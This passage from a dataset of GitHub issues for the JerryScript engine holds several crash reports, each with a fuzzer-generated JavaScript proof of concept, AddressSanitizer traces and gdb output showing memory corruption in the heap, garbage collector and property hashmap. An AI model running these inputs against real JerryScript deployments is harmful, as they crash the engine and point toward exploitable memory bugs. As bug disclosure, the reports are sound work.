#12 0x00005555555f188c in ecma_builtin_dispatch_routine (func_obj_p=0x5555558447a0 <jerry_global_heap+1272>, this_arg_value=1259, arguments_list_p=0x7fffffffde24, arguments_list_len=1) at /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1181
#13 0x00005555555f19c3 in ecma_builtin_dispatch_call (obj_p=0x5555558447a0 <jerry_global_heap+1272>, this_arg_value=1259, arguments_list_p=0x7fffffffe080, arguments_list_len=1) at /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1205
#14 0x00005555555deb90 in ecma_op_function_call_simple (func_obj_p=0x5555558447a0 <jerry_global_heap+1272>, this_arg_value=1259, arguments_list_p=0x7fffffffe080, arguments_list_len=1) at /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:846
#15 0x00005555555df2fa in ecma_op_function_call (func_obj_p=0x5555558447a0 <jerry_global_heap+1272>, this_arg_value=1259, arguments_list_p=0x7fffffffe080, arguments_list_len=1) at /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1143
#16 0x00005555555a4183 in opfunc_call.lto_priv.496 (frame_ctx_p=0x7fffffffe020) at /home/oszi/jerryscript/jerry-core/vm/vm.c:779
#17 0x000055555558bc3d in vm_execute (frame_ctx_p=0x7fffffffe020) at /home/oszi/jerryscript/jerry-core/vm/vm.c:4699
#18 0x000055555558be7e in vm_run (bytecode_header_p=0x555555845700 <jerry_global_heap+5208>, this_binding_value=27, lex_env_p=0x5555558442d8 <jerry_global_heap+48>, arg_list_p=0x0, arg_list_len=0) at /home/oszi/jerryscript/jerry-core/vm/vm.c:4801
#19 0x00005555555a37f4 in vm_run_global (bytecode_p=0x555555845700 <jerry_global_heap+5208>) at /home/oszi/jerryscript/jerry-core/vm/vm.c:340
#20 0x00005555555f8749 in jerry_run (func_val=267) at /home/oszi/jerryscript/jerry-core/api/jerry.c:589
#21 0x00005555555f5cd5 in main (argc=2, argv=0x7fffffffe4c8) at /home/oszi/jerryscript/jerry-main/main-unix.c:123
``` | Assertion '(c & LIT_UTF8_3_BYTE_MASK) == LIT_UTF8_3_BYTE_MARKER' in lit_read_code_unit_from_utf8 | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4129/comments | 1 | 2020-08-12T10:38:15Z | 2020-08-18T11:56:01Z | https://github.com/jerryscript-project/jerryscript/issues/4129 | 677,585,042 | 4,129 |
[
"jerryscript-project",
"jerryscript"
]
|
Does jerry have a tool similar to d8 in v8 to measure the time of each stage of compilation and execution? | Does jerry have a tool similar to d8 in v8 to measure the time of each stage of compilation and execution? | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4107/comments | 2 | 2020-08-04T09:30:31Z | 2020-11-16T14:06:37Z | https://github.com/jerryscript-project/jerryscript/issues/4107 | 672,649,128 | 4,107 |
[
"jerryscript-project",
"jerryscript"
]
|
Memory corruption in in jmem_heap_alloc (jerryscript/jerry-core/jmem/jmem-heap.c:189)
###### JerryScript revision
commit : https://github.com/jerryscript-project/jerryscript/commit/26a299adf0318354caebf3294c46a35ddb9bae50
version : v2.3.0
###### Build platform
Ubuntu 16.04.1 LTS (4.15.0-45-generic x86_64)
###### Build steps
```
python tools/build.py --profile=es2015-subset --lto=off --compile-flag=-g \
--strip=off --logging=on \
--compile-flag=-fsanitize=address --stack-limit=15
```
###### Test case
xxxxxxxxxxxxx.js
```
function main() {
var v4 = [13.37,13.37,13.37];
var v6 = [1337,1337,1337];
var v7 = [];
var v8 = {b:13.37,d:565692808};
var v9 = {__proto__:v6,b:DataView,d:"match",e:v8};
var v10 = v7;
var v15 = [13.37,13.37,13.37];
var v17 = v15.reverse();
var v19 = String;
var v20 = v17.reduceRight(v19);
var v21 = String.fromCharCode(String,1337);
var v22 = RegExp(v21);
var v25 = [13.37,13.37];
async function v27(v28,v29,v30,v31,v32) {
var v34 = RegExp();
return String;
}
var v35 = [13.37,13.37,"uQXGfNINNe",JSON,13.37,1337,-65535,"uQXGfNINNe",v25];
var v36 = {};
var v38 = Symbol.search;
function v39(v40,v41,v42,v43,v44) {
return v7;
}
var v45 = {b:v35,c:-65535,constructor:1337,d:v35,e:13.37,length:JSON};
async function v46(v47,v48,v49,v50,v51) {
}
var v54 = Math.cos();
var v57 = new Map(arguments);
var v62 = [13.37,13.37,13.37,13.37];
var v63 = [v62,Promise,"caller","caller"];
var v64 = {a:-2510604095,c:-2510604095,d:"caller",e:v63,valueOf:-2510604095};
var v67 = new Int8Array(34809);
for (var v69 in "mgGiYOWJuj") {
var v70 = v69.match();
}
async function v71(v72,v73,v74,v75,v76) {
function* v79(v80,v81,v82,v83,v84) {
yield* v83;
return -2546168978;
}
var v85 = v79("MIN_VALUE",-1165603609,..."MIN_VALUE",-1165603609);
var v87 = new WeakMap(v85);
}
var v92 = [1337,13.37,13.37,13.37];
var v93 = ["EPSILON"];
var v94 = v71(13.37,13.37);
var v97 = [1337,1337,13.37];
var v98 = v67[-3176153122];
var v99 = RegExp();
var v101 = undefined;
var v105 = ["trFYu6cu5w"];
async function v107(v108,v109,v110,v111,v112) {
var v113 = v107(1,v110,v105);
var v115 = Symbol.match;
v110[v115] = v64;
}
var v116 = RegExp(..."function");
var v117 = v107();
// Stderr:
}
main();
```
###### Execution steps
1. Username must contains 4 letters (example: xxxx. x can be any letters.).
2. js file must in /home/xxxx/xxx/xxxxxxx/xxxxxx/xxxxxxxx/ (x can be any letters).
3. js filename must contains 13 letters (example: xxxxxxxxxxxxx.js. x can be any letters).
4. run with jsfile's full path (example: /home/xxxx/xxx/xxxxxxx/xxxxxx/xxxxxxxx/xxxxxxxxxxxxx.js. x can be any letters).
```
$ ls
xxxxxxxxxxxxx.js
$ pwd
/home/test/xxx/xxxxxxx/xxxxxx/xxxxxxxx
$ ../jerryscript/build/bin/jerry /home/test/xxx/xxxxxxx/xxxxxx/xxxxxxxx/xxxxxxxxxxxxx.js
ASAN:SIGSEGV
=================================================================
==4910==ERROR: AddressSanitizer: SEGV on unknown address 0x00001446a628 (pc 0x000000403b24 bp 0x000000000000 sp 0x7ffe258fc030 T0)
#0 0x403b23 in jmem_heap_alloc /home/test/AST/jerryscript/jerry-core/jmem/jmem-heap.c:189
#1 0x439ab7 in jmem_heap_gc_and_alloc_block /home/test/AST/jerryscript/jerry-core/jmem/jmem-heap.c:296
#2 0x44d562 in re_initialize_regexp_bytecode /home/test/AST/jerryscript/jerry-core/parser/regexp/re-bytecode.c:37
#3 0x44df4e in re_compile_bytecode /home/test/AST/jerryscript/jerry-core/parser/regexp/re-compiler.c:121
#4 0x435576 in ecma_op_create_regexp_from_pattern /home/test/AST/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:336
#5 0x473798 in ecma_builtin_regexp_dispatch_helper /home/test/AST/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp.c:174
#6 0x41b42b in ecma_builtin_dispatch_call /home/test/AST/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1213
#7 0x4260e1 in ecma_op_function_call /home/test/AST/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1142
#8 0x45f09c in vm_spread_operation /home/test/AST/jerryscript/jerry-core/vm/vm.c:694
#9 0x45f09c in vm_execute /home/test/AST/jerryscript/jerry-core/vm/vm.c:4692
#10 0x45f78b in vm_run /home/test/AST/jerryscript/jerry-core/vm/vm.c:4783
#11 0x424c34 in ecma_op_function_call_simple /home/test/AST/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:943
#12 0x4260e1 in ecma_op_function_call /home/test/AST/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1142
#13 0x45e6f1 in opfunc_call /home/test/AST/jerryscript/jerry-core/vm/vm.c:778
#14 0x45e6f1 in vm_execute /home/test/AST/jerryscript/jerry-core/vm/vm.c:4681
#15 0x45f78b in vm_run /home/test/AST/jerryscript/jerry-core/vm/vm.c:4783
#16 0x406a59 in jerry_run /home/test/AST/jerryscript/jerry-core/api/jerry.c:579
#17 0x4026db in main /home/test/AST/jerryscript/jerry-main/main-unix.c:123
#18 0x7f821826083f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
#19 0x404238 in _start (/home/test/AST/jerryscript/build/bin/jerry+0x404238)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/test/AST/jerryscript/jerry-core/jmem/jmem-heap.c:189 jmem_heap_alloc
==4910==ABORTING
```
```
$ ls
xxxxxxxxxxxxx.js
$ pwd
/home/test/xxx/xxxxxxx/xxxxxx/xxxxxxxx
$ ../jerryscript-noasan/build/bin/jerry /home/test/xxx/xxxxxxx/xxxxxx/xxxxxxxx/xxxxxxxxxxxxx.js
Segmentation fault (core dumped)
```
###### Backtrace
```
$ gdb -args ../../../../AST/jerryscript-noasan/build/bin/jerry /home/test/xxx/xxxxxxx/xxxxxx/xxxxxxxx/xxxxxxxxxxxxx.js
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ../../jerryscript-noasan/build/bin/jerry...done.
(gdb) r
Starting program: /home/test/AST/jerryscript-noasan/build/bin/jerry /home/test/xxx/xxxxxxx/xxxxxx/xxxxxxxx/xxxxxxxxxxxxx.js
Program received signal SIGSEGV, Segmentation fault.
jmem_heap_alloc (size=size@entry=20) at /home/test/AST/jerryscript-noasan/jerry-core/jmem/jmem-heap.c:185
185 const uint32_t next_offset = current_p->next_offset;
(gdb) x/3i $rip
=> 0x4014c8 <jmem_heap_alloc+182>: mov 0x667338(%rdx),%edx
0x4014ce <jmem_heap_alloc+188>: mov 0x4(%rax),%ecx
0x4014d1 <jmem_heap_alloc+191>: cmp %rcx,%rdi
(gdb) p/x $rdx
$1 = 0x13d90070
(gdb) x/gx 0x13d90070
0x13d90070: Cannot access memory at address 0x13d90070
``` | Memory corruption in in jmem_heap_alloc (jerryscript/jerry-core/jmem/jmem-heap.c:189) | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4097/comments | 0 | 2020-08-03T09:32:24Z | 2020-08-11T12:01:19Z | https://github.com/jerryscript-project/jerryscript/issues/4097 | 671,939,001 | 4,097 |
[
"jerryscript-project",
"jerryscript"
]
|
Memory corruption in in ecma_gc_set_object_visited (jerryscript/jerry-core/ecma/base/ecma-gc.c:85)
###### JerryScript revision
commit : https://github.com/jerryscript-project/jerryscript/commit/26a299adf0318354caebf3294c46a35ddb9bae50
version : v2.3.0
###### Build platform
Ubuntu 16.04.1 LTS (4.15.0-45-generic x86_64)
###### Build steps
```
python tools/build.py --profile=es2015-subset --lto=off --compile-flag=-g \
--strip=off --logging=on \
--compile-flag=-fsanitize=address --stack-limit=15
```
###### Test case
Memory_corruption_ecma_gc_set_object_visited.js
```
function main() {
var v4 = [13.37,13.37];
var v6 = [1337,1337,1337,1337,1337];
var v7 = [13.37,Uint8ClampedArray,1337,-65535,-65535,"OaT5sFZLFO"];
var v8 = {__proto__:1337,a:Uint8ClampedArray,b:1337,constructor:-65535,valueOf:"OaT5sFZLFO"};
var v9 = {__proto__:v7,b:Uint8ClampedArray,c:-65535,constructor:v7,toString:"OaT5sFZLFO",valueOf:1337};
var v10 = [-65535,...v7];
var v12 = [13.37];
var v15 = [-370590.12831863505,-370590.12831863505,-370590.12831863505,-370590.12831863505];
var v17 = {b:v15,c:1337,constructor:v15,e:1337};
var v19 = new Proxy(v17,Object);
v19.__proto__ = v12;
var v24 = "trFYu6cu5w".slice(1);
var v27 = WeakMap;
var v29 = [13.37,3205311021,13.37,13.37];
try {
var v30 = v27();
} catch(v31) {
}
var v32 = [13.37,13.37,13.37];
var v34 = [1337,1337,1337,1337,1337];
var v35 = ["trFYu6cu5w"];
var v36 = {__proto__:1,b:Float32Array,c:1,d:"trFYu6cu5w",length:1,toString:1337};
var v37 = Float32Array instanceof Float32Array;
var v39 = -1024;
var v40 = v39 + 1;
var v41 = {__proto__:v32,b:1,constructor:13.37,valueOf:v35};
var v42 = "trFYu6cu5w";
var v45 = -1226825305 + -1226825305;
var v46 = ["trFYu6cu5w"];
async function v48(v49,v50,v51,v52,v53) {
var v54 = v48(1,v51,v46,v50);
var v57 = [-65536];
var v58 = async (v59,v60,v61) => {
return v59;
};
var v62 = v58(v58);
var v63 = v58(v62,v57);
var v65 = ["NEGATIVE_INFINITY"];
var v66 = async (v67,v68,v69) => {
return v63;
};
var v70 = v66(v66,v66);
var v71 = v66(v70,v65);
var v74 = ["EPSILON"];
var v76 = "pgy/i*bidI".match();
var v77 = {apply:v54,call:v48,construct:v52,deleteProperty:v51,get:v48,getOwnPropertyDescriptor:v51,isExtensible:v52,set:v48,setPrototypeOf:isFinite};
var v79 = Proxy();
var v80 = isFinite();
var v82 = 13.37;
var v83 = {call:isFinite,construct:isFinite,defineProperty:isFinite,deleteProperty:isFinite,getOwnPropertyDescriptor:isFinite,has:isFinite,ownKeys:isFinite,preventExtensions:isFinite,e:isFinite,setPrototypeOf:isFinite};
var v86 = {get:v48};
var v88 = Object.defineProperty(v42,"__proto__");
var v89 = Int32Array(v74);
var v91 = [1.7976931348623157e+308];
var v93 = (-329557.7589866845).constructor;
var v94 = v91;
var v95 = v94 + 1;
var v97 = v89.subarray(3);
var v100 = [1337,1337,1337,1337,1337];
var v101 = [v100];
var v102 = [DataView];
var v103 = "symbol".lastIndexOf;
var v108 = "EPSILON".replace(0,"valueOf");
var v111 = ["function"];
var v112 = Int8Array();
var v114 = ["EPSILON",13.37,13.37,13.37];
var v115 = v114.lastIndexOf(v108,13.37);
var v116 = {};
var v117 = [v116,v116,v116,v116,v116];
for (var v121 = 0; v121 < 5; v121 = v121 + 1) {
}
}
var v124 = v48(13.37,13.37,"EPSILON");
var v126 = [-2.0,-2.0,-2.0,-2.0];
var v127 = v48(v48,v35,"trFYu6cu5w",v124,v41);
// Stderr:
}
main();
```
###### Execution steps
```
$ ls
Memory_corruption_ecma_gc_set_object_visited.js
$ ../jerryscript/build/bin/jerry Memory_corruption_ecma_gc_set_object_visited.js
ASAN:SIGSEGV
=================================================================
==4826==ERROR: AddressSanitizer: SEGV on unknown address 0x00000540a590 (pc 0x00000040af94 bp 0x0000006dceb4 sp 0x7fff81ac4240 T0)
#0 0x40af93 in ecma_gc_set_object_visited /home/test/AST/jerryscript/jerry-core/ecma/base/ecma-gc.c:85
#1 0x40a0ce in ecma_gc_mark_promise_object /home/test/AST/jerryscript/jerry-core/ecma/base/ecma-gc.c:284
#2 0x40a0ce in ecma_gc_mark /home/test/AST/jerryscript/jerry-core/ecma/base/ecma-gc.c:588
#3 0x40b856 in ecma_gc_run /home/test/AST/jerryscript/jerry-core/ecma/base/ecma-gc.c:1520
#4 0x403e80 in jmem_heap_realloc_block /home/test/AST/jerryscript/jerry-core/jmem/jmem-heap.c:539
#5 0x40ce6a in ecma_collection_push_back /home/test/AST/jerryscript/jerry-core/ecma/base/ecma-helpers-collection.c:141
#6 0x42f9e0 in ecma_promise_do_then /home/test/AST/jerryscript/jerry-core/ecma/operations/ecma-promise-object.c:876
#7 0x42f9e0 in ecma_promise_then /home/test/AST/jerryscript/jerry-core/ecma/operations/ecma-promise-object.c:941
#8 0x471981 in ecma_builtin_promise_prototype_then /home/test/AST/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-promise-prototype.c:51
#9 0x471981 in ecma_builtin_promise_prototype_dispatch_routine /home/test/AST/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-promise-prototype.inc.h:32
#10 0x41b3e1 in ecma_builtin_dispatch_routine /home/test/AST/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1181
#11 0x41b3e1 in ecma_builtin_dispatch_call /home/test/AST/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1205
#12 0x4260e1 in ecma_op_function_call /home/test/AST/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1142
#13 0x428785 in ecma_process_promise_resolve_thenable_job /home/test/AST/jerryscript/jerry-core/ecma/operations/ecma-jobqueue.c:381
#14 0x428785 in ecma_process_all_enqueued_jobs /home/test/AST/jerryscript/jerry-core/ecma/operations/ecma-jobqueue.c:541
#15 0x402a94 in main /home/test/AST/jerryscript/jerry-main/main-unix.c:286
#16 0x7f03f4d0683f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
#17 0x404238 in _start (/home/test/AST/jerryscript/build/bin/jerry+0x404238)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/test/AST/jerryscript/jerry-core/ecma/base/ecma-gc.c:85 ecma_gc_set_object_visited
==4826==ABORTING
```
```
$ ls
Memory_corruption_ecma_gc_set_object_visited.js
$ ../jerryscript-noasan/build/bin/jerry Memory_corruption_ecma_gc_set_object_visited.js
Segmentation fault (core dumped)
```
###### Backtrace
```
$ gdb -args ../../../../AST/jerryscript-noasan/build/bin/jerry Memory_corruption_ecma_gc_set_object_visited.js
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ../../jerryscript-noasan/build/bin/jerry...done.
(gdb) r
Starting program: /home/test/AST/jerryscript-noasan/build/bin/jerry Memory_corruption_ecma_gc_set_object_visited.js
Program received signal SIGSEGV, Segmentation fault.
ecma_gc_set_object_visited (object_p=0x8ea7310) at /home/test/AST/jerryscript-noasan/jerry-core/ecma/base/ecma-gc.c:85
85 if (object_p->type_flags_refs >= ECMA_OBJECT_NON_VISITED)
(gdb) x/3i $rip
=> 0x4051f4 <ecma_gc_set_object_visited>: mov (%rdi),%ax
0x4051f7 <ecma_gc_set_object_visited+3>: cmp $0xffbf,%ax
0x4051fb <ecma_gc_set_object_visited+7>: jbe 0x40522b <ecma_gc_set_object_visited+55>
(gdb) p/x $rdi
$1 = 0x8ea7310
(gdb) x/gx 0x8ea7310
0x8ea7310: Cannot access memory at address 0x8ea7310
``` | Memory corruption in in ecma_gc_set_object_visited (jerryscript/jerry-core/ecma/base/ecma-gc.c:85) | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4096/comments | 0 | 2020-08-03T09:18:32Z | 2020-08-12T18:45:08Z | https://github.com/jerryscript-project/jerryscript/issues/4096 | 671,930,138 | 4,096 |
[
"jerryscript-project",
"jerryscript"
]
|
Memory corruption in in jmem_pools_collect_empty (jerryscript/jerry-core/jmem/jmem-poolman.c:165)
###### JerryScript revision
commit : https://github.com/jerryscript-project/jerryscript/commit/26a299adf0318354caebf3294c46a35ddb9bae50
version : v2.3.0
###### Build platform
Ubuntu 16.04.1 LTS (4.15.0-45-generic x86_64)
###### Build steps
```
python tools/build.py --profile=es2015-subset --lto=off --compile-flag=-g \
--strip=off --logging=on \
--compile-flag=-fsanitize=address --stack-limit=15
```
###### Test case
Memory_corruption_jmem_pools_collect_empty.js
```
function main() {
var v4 = [-545238.9091190018,-545238.9091190018,-545238.9091190018,-545238.9091190018];
var v6 = [2805259460];
var v7 = [Infinity,2805259460,"b",-545238.9091190018,2805259460,v4];
var v8 = {c:Infinity,d:v4,e:v4,length:-545238.9091190018,valueOf:"b"};
var v9 = {__proto__:v4,a:-545238.9091190018,d:v6,length:v8,toString:v6};
var v10 = v8;
var v15 = [13.37,13.37,13.37,13.37];
var v17 = [1337];
var v18 = ["8*1/1r3kUV",v15,13.37,"8*1/1r3kUV",v17,13.37];
var v19 = {b:1337,c:isFinite,e:v18,length:1337,valueOf:v15};
var v23 = [13.37,13.37,13.37];
var v27 = [2.220446049250313e-16,2.220446049250313e-16,"NEGATIVE_INFINITY"];
var v28 = async (v29,v30,v31) => {
var v32 = v27.copyWithin();
return v31;
};
var v34 = v23.reverse();
var v36 = String;
var v37 = v34.reduceRight(v36);
var v38 = String.fromCharCode(String,1337,String,v37);
var v41 = [895176.4098468735,895176.4098468735];
async function v43(v44,v45,v46,v47,v48) {
var v50 = RegExp();
return v50;
}
var v51 = [895176.4098468735,895176.4098468735,"uQXGfNINNe",JSON,895176.4098468735,1337,-65535,"uQXGfNINNe",v41];
var v52 = {};
var v53 = {b:v51,c:-65535,constructor:1337,d:v51,e:895176.4098468735,length:JSON};
var v54 = JSON;
async function v56(v57,v58,v59,v60,v61) {
return v58;
}
var v65 = new Uint16Array(Function);
var v69 = new Map();
async function v77(v78,v79,v80,v81,v82) {
function* v85(v86,v87,v88,v89,v90) {
yield* v89;
v17[-997023272] = v81;
var v92 = 0;
var v93 = !v92;
return 1024;
}
var v94 = v85("MIN_VALUE",-1165603609,..."MIN_VALUE",-1165603609);
var v96 = new WeakMap(v94);
return v85;
}
var v97 = 257;
var v104 = v77(13.37,13.37,"EPSILON","EPSILON",v77);
var v107 = [1337,1337,13.37];
v107.constructor = 13.37;
var v108 = v69.keys();
var v109 = v15;
var v111 = ["trFYu6cu5w"];
var v114 = Promise.bind(1);
var v116 = {};
var v118 = new Promise(Symbol,v116);
v118.__proto__ = v111;
// Stderr:
}
main();
```
###### Execution steps
```
$ ls
Memory_corruption_jmem_pools_collect_empty.js
$ ../jerryscript/build/bin/jerry Memory_corruption_jmem_pools_collect_empty.js
ASAN:SIGSEGV
=================================================================
==4759==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000439c29 bp 0x7ffeef1d6370 sp 0x7ffeef1d6060 T0)
#0 0x439c28 in jmem_pools_collect_empty /home/test/AST/jerryscript/jerry-core/jmem/jmem-poolman.c:165
#1 0x4397da in jmem_finalize /home/test/AST/jerryscript/jerry-core/jmem/jmem-allocator.c:161
#2 0x402b56 in main /home/test/AST/jerryscript/jerry-main/main-unix.c:324
#3 0x7f0b20b3d83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
#4 0x404238 in _start (/home/test/AST/jerryscript/build/bin/jerry+0x404238)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/test/AST/jerryscript/jerry-core/jmem/jmem-poolman.c:165 jmem_pools_collect_empty
==4759==ABORTING
```
```
$ ls
Memory_corruption_jmem_pools_collect_empty.js
$ ../jerryscript-noasan/build/bin/jerry Memory_corruption_jmem_pools_collect_empty.js
Segmentation fault (core dumped)
```
###### Backtrace
```
$ gdb -args ../../../../AST/jerryscript-noasan/build/bin/jerry Memory_corruption_jmem_pools_collect_empty.js
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./AST/jerryscript-noasan/build/bin/jerry...done.
(gdb) r
Starting program: /home/test/AST/jerryscript-noasan/build/bin/jerry ./Memory_corruption_jmem_pools_collect_empty.js
Program received signal SIGSEGV, Segmentation fault.
jmem_pools_collect_empty () at /home/test/AST/jerryscript-noasan/jerry-core/jmem/jmem-poolman.c:165
165 jmem_pools_chunk_t *const next_p = chunk_p->next_p;
(gdb) x/3i $rip
=> 0x41bef5 <jmem_pools_collect_empty+24>: mov (%rdi),%rbx
0x41bef8 <jmem_pools_collect_empty+27>: mov $0x8,%esi
0x41befd <jmem_pools_collect_empty+32>: callq 0x401555 <jmem_heap_free_block_internal>
(gdb) p/x $rdi
$1 = 0x4280000667840
(gdb) x/gx 0x4280000667840
0x4280000667840: Cannot access memory at address 0x4280000667840
``` | Memory corruption in in jmem_pools_collect_empty (jerryscript/jerry-core/jmem/jmem-poolman.c:165) | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4095/comments | 0 | 2020-08-03T09:07:35Z | 2020-08-11T12:01:19Z | https://github.com/jerryscript-project/jerryscript/issues/4095 | 671,923,296 | 4,095 |
[
"jerryscript-project",
"jerryscript"
]
|
Memory corruption in in ecma_property_hashmap_find (jerryscript/jerry-core/ecma/base/ecma-property-hashmap.c:480)
###### JerryScript revision
commit : https://github.com/jerryscript-project/jerryscript/commit/26a299adf0318354caebf3294c46a35ddb9bae50
version : v2.3.0
###### Build platform
Ubuntu 16.04.1 LTS (4.15.0-45-generic x86_64)
###### Build steps
```
python tools/build.py --profile=es2015-subset --lto=off --compile-flag=-g \
--strip=off --logging=on \
--compile-flag=-fsanitize=address --stack-limit=15
```
###### Test case
Memory_corruption_ecma_property_hashmap_find.js
```
function main() {
var v4 = [13.37];
var v6 = [1337,1337,1337,1337];
var v7 = [1337,Reflect,v4,"function",Reflect,1337,1283242462,v4,1337,v4];
var v8 = {b:v7,c:v7,d:1283242462,e:1337};
var v9 = {__proto__:v6};
var v10 = 1283242462;
var v15 = [1000.0,1000.0,1000.0];
var v17 = [1337,1337];
var v18 = [v17,1337,v17,v17,1337,"U5XfzZnjMi",1000.0,785945262,Int32Array,"U5XfzZnjMi"];
var v19 = {__proto__:Int32Array,d:v15,e:v15};
var v20 = {__proto__:v15,a:Int32Array,b:"U5XfzZnjMi",constructor:1337,d:1000.0,e:v18};
var v21 = 1337;
var v26 = [13.37,13.37,13.37,13.37];
var v28 = [1337,1337,1337,1337,1337];
var v29 = [v26,Promise,"caller","caller"];
var v30 = {a:-2510604095,c:-2510604095,d:"caller",e:v29,valueOf:-2510604095};
var v31 = {__proto__:Promise,a:"caller",c:13.37,constructor:"caller",toString:v28,valueOf:1337};
var v32 = v30;
var v37 = [13.37,13.37,13.37,13.37];
var v38 = [v37,Promise,"caller",v26];
var v41 = 0;
var v43 = [13.37,13.37,13.37];
for (var v44 in v43) {
var v46 = Function();
var v47 = v43.pop();
}
var v51 = [v41,13.37,v20];
var v52 = ["trFYu6cu5w"];
var v53 = {__proto__:v51,b:1,constructor:13.37,valueOf:v52};
async function v55(v56,v57,v58,v59,v60) {
for (var v61 of v59) {
var v62 = await v60;
}
v32 = 13.37;
var v64 = v56(v56,v59,Infinity,13.37,"4eHA6Qb60z");
var v65 = v59[1337];
for (var v66 of v59) {
}
var v68 = parseFloat("4eHA6Qb60z");
return v38;
}
var v71 = v55(13.37,13.37,"EPSILON","EPSILON");
var v73 = [2995767872,2995767872,2995767872,2995767872,2995767872];
var v74 = [...v73,..."QRtZ09jMcv"];
var v77 = ["trFYu6cu5w"];
var v78 = "EPSILON".concat(v73,v38,"5PS2Lo7K4R");
var v80 = [13.37,13.37,13.37,13.37];
async function v81(v82,v83,v84,v85,v86) {
}
var v88 = v81(13.37,13.37,v80);
async function v90(v91,v92,v93,v94,v95) {
var v96 = v90(1,v93,v77,v92,-1.7976931348623157e+308);
var v100 = [13.37,13.37,"EPSILON",13.37];
var v103 = [-822000.4262047571,-822000.4262047571,-822000.4262047571,-822000.4262047571];
var v104 = new Float32Array(v103);
var v106 = {b:v100,c:1337,constructor:v100,e:1337};
var v107 = v104 + v106;
var v108 = v107(...v107);
var v110 = RegExp(2);
return 1;
}
var v111 = v90(1,1,v52,v53);
// Stderr:
}
main();
```
###### Execution steps
```
$ ls
Memory_corruption_ecma_property_hashmap_find.js
$ ../jerryscript/build/bin/jerry Memory_corruption_ecma_property_hashmap_find.js
ASAN:SIGSEGV
=================================================================
==4638==ERROR: AddressSanitizer: SEGV on unknown address 0x000094c9c590 (pc 0x0000004177a3 bp 0x7ffff80755e0 sp 0x7ffff8075540 T0)
#0 0x4177a2 in ecma_property_hashmap_find /home/test/AST/jerryscript/jerry-core/ecma/base/ecma-property-hashmap.c:480
#1 0x414869 in ecma_find_named_property /home/test/AST/jerryscript/jerry-core/ecma/base/ecma-helpers.c:608
#2 0x42ae2c in ecma_op_object_get_own_property /home/test/AST/jerryscript/jerry-core/ecma/operations/ecma-objects.c:240
#3 0x42b0d2 in ecma_op_ordinary_object_has_own_property /home/test/AST/jerryscript/jerry-core/ecma/operations/ecma-objects.c:3019
#4 0x42b0d2 in ecma_op_object_has_property /home/test/AST/jerryscript/jerry-core/ecma/operations/ecma-objects.c:373
#5 0x47799e in ecma_op_put_value_lex_env_base /home/test/AST/jerryscript/jerry-core/ecma/operations/ecma-get-put-value.c:264
#6 0x45d66c in vm_loop /home/test/AST/jerryscript/jerry-core/vm/vm.c:4322
#7 0x45e526 in vm_execute /home/test/AST/jerryscript/jerry-core/vm/vm.c:4675
#8 0x45352e in opfunc_resume_executable_object /home/test/AST/jerryscript/jerry-core/vm/opcodes.c:825
#9 0x4285a8 in ecma_process_promise_async_reaction_job /home/test/AST/jerryscript/jerry-core/ecma/operations/ecma-jobqueue.c:319
